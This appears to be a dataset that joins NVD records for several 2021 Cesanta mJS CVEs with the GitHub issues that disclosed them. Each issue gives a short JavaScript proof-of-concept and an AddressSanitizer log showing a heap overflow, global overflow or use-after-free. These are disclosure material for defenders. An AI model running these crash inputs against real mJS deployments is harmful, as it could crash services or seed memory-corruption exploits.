(/usr/local/bin/Gmjs+0xe449) 0x60b0000000ab is located 0 bytes to the right of 107-byte region [0x60b000000040,0x60b0000000ab) allocated by thread T0 here: #0 0x7fb412dd2f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x55ed154e8346 in mbuf_resize src/common/mbuf.c:50 SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs_util.c:61 in mjs_jprintf Shadow bytes around the buggy address: 0x0c167fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x0c167fff8010: 00 00 00 00 00[03]fa fa fa fa fa fa fa fa 00 00 0x0c167fff8020: 00 00 00 00 00 00 00 00 00 00 07 fa fa fa fa fa 0x0c167fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ```
Heap-buffer-overflow src/mjs_util.c:61 in mjs_jprintf
https://api.github.com/repos/cesanta/mjs/issues/193/comments
0
2021-12-31T05:35:03Z
2021-12-31T05:35:03Z
https://github.com/cesanta/mjs/issues/193
1,091,426,673
193
3,144
CVE-2021-46521
2022-01-27T21:15:09.990
Cesanta MJS v2.20.0 was discovered to contain a global buffer overflow via c_vsnprintf at mjs/src/common/str_util.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/190" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/cesanta/mjs/issues/190
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_CLANG=clang $(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))((JSON.parse - 6. + 4321e2)([([JSON.parse(JSON.stringify([(0)]))])])); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ================================================================= ==61818==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000064c54a at pc 0x0000005ea260 bp 0x7fff3bbcc940 sp 0x7fff3bbcc938 WRITE of size 4 at 0x00000064c54a thread T0 #0 0x5ea25f in c_vsnprintf /root/mjs/src/common/str_util.c:180:14 #1 0x55178f in mjs_exec_internal /root/mjs/src/mjs_exec.c:1073:5 #2 0x552d2d in mjs_exec_file /root/mjs/src/mjs_exec.c:1096:11 #3 0x5821d3 in main /root/mjs/src/mjs_main.c:47:11 #4 0x7f1016453b96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310 #5 0x41a2c9 in _start (/usr/local/bin/mjs+0x41a2c9) 0x00000064c54a is located 54 bytes to the left of global variable '<string literal>' defined in 'src/mjs_util.c:125:7' (0x64c580) of size 15 '<string literal>' is ascii string 'src/mjs_util.c' 0x00000064c54b is located 0 bytes to the right of global variable '<string literal>' defined in 'src/mjs_util.c:120:30' (0x64c540) of size 11 '<string literal>' is ascii string ' %-3u %-8s' SUMMARY: AddressSanitizer: global-buffer-overflow /root/mjs/src/common/str_util.c:180:14 in c_vsnprintf Shadow bytes around the buggy address: 0x0000800c1850: 00 02 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 0x0000800c1860: 07 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 0x0000800c1870: 06 f9 f9 f9 f9 f9 f9 f9 00 01 f9 f9 f9 f9 f9 f9 0x0000800c1880: 00 02 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 0x0000800c1890: 00 02 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 =>0x0000800c18a0: 00 04 f9 f9 f9 f9 f9 f9 00[03]f9 f9 f9 f9 f9 f9 0x0000800c18b0: 00 07 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 0x0000800c18c0: 07 f9 f9 f9 f9 f9 f9 f9 00 05 f9 f9 f9 f9 f9 f9 0x0000800c18d0: 00 02 f9 f9 f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 0x0000800c18e0: 00 00 04 f9 f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9 0x0000800c18f0: 02 f9 f9 f9 f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==61818==ABORTING ``` Credits: Found by OWL337 team.
Global-buffer-overflow mjs/src/common/str_util.c:180:14 in c_vsnprintf
https://api.github.com/repos/cesanta/mjs/issues/190/comments
0
2021-12-31T05:25:14Z
2022-01-12T02:18:45Z
https://github.com/cesanta/mjs/issues/190
1,091,424,729
190
3,145
CVE-2021-46522
2022-01-27T21:15:10.033
Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via /usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/196" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/196" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/cesanta/mjs/issues/196
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function JSEtest(a) { let arr = ['prototype'.indexOf(JSON.stringify({ foo: [], bar: {} }, ['foo', 'bar', 'myProp']))]; if (a < 10) JSEtest(a + 1); } JSEtest(0); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b0000000ab at pc 0x7fabea0b7f54 bp 0x7ffdfc32c250 sp 0x7ffdfc32b9f8 READ of size 19 at 0x60b0000000ab thread T0 #0 0x7fabea0b7f53 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53) #1 0x55e0e1aa2ff6 in mg_strstr src/common/mg_str.c:154 #2 0x55e0e1a6c363 in mjs_string_index_of src/mjs_string.c:366 #3 0x55e0e19c5244 in mjs_execute src/mjs_exec.c:853 #4 0x55e0e19cea05 in mjs_exec_internal src/mjs_exec.c:1073 #5 0x55e0e19cea05 in mjs_exec_file src/mjs_exec.c:1096 #6 0x55e0e198b909 in main src/mjs_main.c:47 #7 0x7fabe9a34b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55e0e198c449 in _start (/usr/local/bin/Gmjs+0xe449) 0x60b0000000ab is located 0 bytes to the right of 107-byte region [0x60b000000040,0x60b0000000ab) allocated by thread T0 here: #0 0x7fabea0e6f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x55e0e1a9d346 in mbuf_resize src/common/mbuf.c:50 SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53) Shadow bytes around the buggy address: 0x0c167fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x0c167fff8010: 00 00 00 00 00[03]fa fa fa fa fa fa fa fa fd fd 0x0c167fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa 0x0c167fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ``` Credits: Found by OWL337 team.
Heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53)
https://api.github.com/repos/cesanta/mjs/issues/196/comments
0
2021-12-31T05:38:16Z
2022-01-12T02:19:08Z
https://github.com/cesanta/mjs/issues/196
1,091,427,319
196
3,146
CVE-2021-46523
2022-01-27T21:15:10.077
Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via to_json_or_debug at mjs/src/mjs_json.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/198" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/198" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/cesanta/mjs/issues/198
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build steps ```bash vim Makefile DOCKER_CLANG=clang $(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))((JSON.stringify - 6.5 - 321e2)(JSON.stringify([1, 2, 3]))); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ==122636==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61500000007f at pc 0x00000057b751 bp 0x7fff091bd080 sp 0x7fff091bd078 WRITE of size 1 at 0x61500000007f thread T0 #0 0x57b750 in to_json_or_debug /root/mjs/src/mjs_json.c:154:13 #1 0x55178f in mjs_exec_internal /root/mjs/src/mjs_exec.c:1073:5 #2 0x552d2d in mjs_exec_file /root/mjs/src/mjs_exec.c:1096:11 #3 0x5821d3 in main /root/mjs/src/mjs_main.c:47:11 #4 0x7f2516c85b96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310 #5 0x41a2c9 in _start (/usr/local/bin/mjs+0x41a2c9) 0x61500000007f is located 1 bytes to the left of 472-byte region [0x615000000080,0x615000000258) allocated by thread T0 here: #0 0x4da3a8 in calloc (/usr/local/bin/mjs+0x4da3a8) #1 0x538c1a in mjs_create /root/mjs/src/mjs_core.c:74:21 #2 0x5817e1 in main /root/mjs/src/mjs_main.c:17:21 #3 0x7f2516c85b96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/mjs/src/mjs_json.c:154:13 in to_json_or_debug Shadow bytes around the buggy address: 0x0c2a7fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2a7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c2a7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c2a7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==122636==ABORTING ``` Credits: Found by OWL337 team.
Heap-buffer-overflow mjs/src/mjs_json.c:154:13 in to_json_or_debug
https://api.github.com/repos/cesanta/mjs/issues/198/comments
0
2021-12-31T05:40:39Z
2022-01-12T02:19:30Z
https://github.com/cesanta/mjs/issues/198
1,091,427,798
198
3,147
CVE-2021-46524
2022-01-27T21:15:10.117
Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via snquote at mjs/src/mjs_json.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/192" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/192" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/cesanta/mjs/issues/192
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (function() { ((function JSEtest(a Number) { if (a > 0) { gc((JSON.stringify(gc('#1.1: -0 - -0 === 0. Actual: '))) !== JSON.stringify('#1.1: -0 - -0 === 0. Actual: ' !== JSEtest(a - 1))) } })(6)) })() ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ================================================================= ==109655==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6110000004d6 at pc 0x559ce8d17a88 bp 0x7ffce13798c0 sp 0x7ffce13798b0 READ of size 1 at 0x6110000004d6 thread T0 #0 0x559ce8d17a87 in snquote src/mjs_json.c:81 #1 0x559ce8d17a87 in to_json_or_debug src/mjs_json.c:167 #2 0x559ce8d17a87 in mjs_json_stringify src/mjs_json.c:267 #3 0x559ce8d17a87 in mjs_op_json_stringify src/mjs_json.c:494 #4 0x559ce8cd2244 in mjs_execute src/mjs_exec.c:853 #5 0x559ce8cdba05 in mjs_exec_internal src/mjs_exec.c:1073 #6 0x559ce8cdba05 in mjs_exec_file src/mjs_exec.c:1096 #7 0x559ce8c98909 in main src/mjs_main.c:47 #8 0x7f97d5af7b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x559ce8c99449 in _start (/usr/local/bin/Gmjs+0xe449) 0x6110000004d6 is located 0 bytes to the right of 214-byte region [0x611000000400,0x6110000004d6) allocated by thread T0 here: #0 0x7f97d61a9f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x559ce8daa346 in mbuf_resize src/common/mbuf.c:50 SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs_json.c:81 in snquote Shadow bytes around the buggy address: 0x0c227fff8040: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8070: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8090: 00 00 00 00 00 00 00 00 00 00[06]fa fa fa fa fa 0x0c227fff80a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff80b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff80c0: 00 04 fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==109655==ABORTING ```
Heap-buffer-overflow src/mjs_json.c:81 in snquote
https://api.github.com/repos/cesanta/mjs/issues/192/comments
0
2021-12-31T05:33:31Z
2021-12-31T05:33:31Z
https://github.com/cesanta/mjs/issues/192
1,091,426,355
192
3,148
CVE-2021-46525
2022-01-27T21:15:10.160
Cesanta MJS v2.20.0 was discovered to contain a heap-use-after-free via mjs_apply at src/mjs_exec.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/199" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/199" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/cesanta/mjs/issues/199
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function T(f) {} function JSEtest(b) { T.apply.apply(T.apply, []); if (b < 10) JSEtest(T.apply, []); } JSEtest(0); ``` </code></pre> </details> ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ================================================================= ======ERROR: AddressSanitizer: heap-use-after-free on address 0x6040000000f8 at pc 0x5590f9ee05d6 bp 0x7fff0f0dc5b0 sp 0x7fff0f0dc5a0 READ of size 8 at 0x6040000000f8 thread T0 #0 0x5590f9ee05d5 in mjs_apply src/mjs_exec.c:1156 #1 0x5590f9ee08d4 in mjs_apply_ src/mjs_exec.c:515 #2 0x5590f9ed4244 in mjs_execute src/mjs_exec.c:853 #3 0x5590f9edda05 in mjs_exec_internal src/mjs_exec.c:1073 #4 0x5590f9edda05 in mjs_exec_file src/mjs_exec.c:1096 #5 0x5590f9e9a909 in main src/mjs_main.c:47 #6 0x7f009363db96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x5590f9e9b449 in 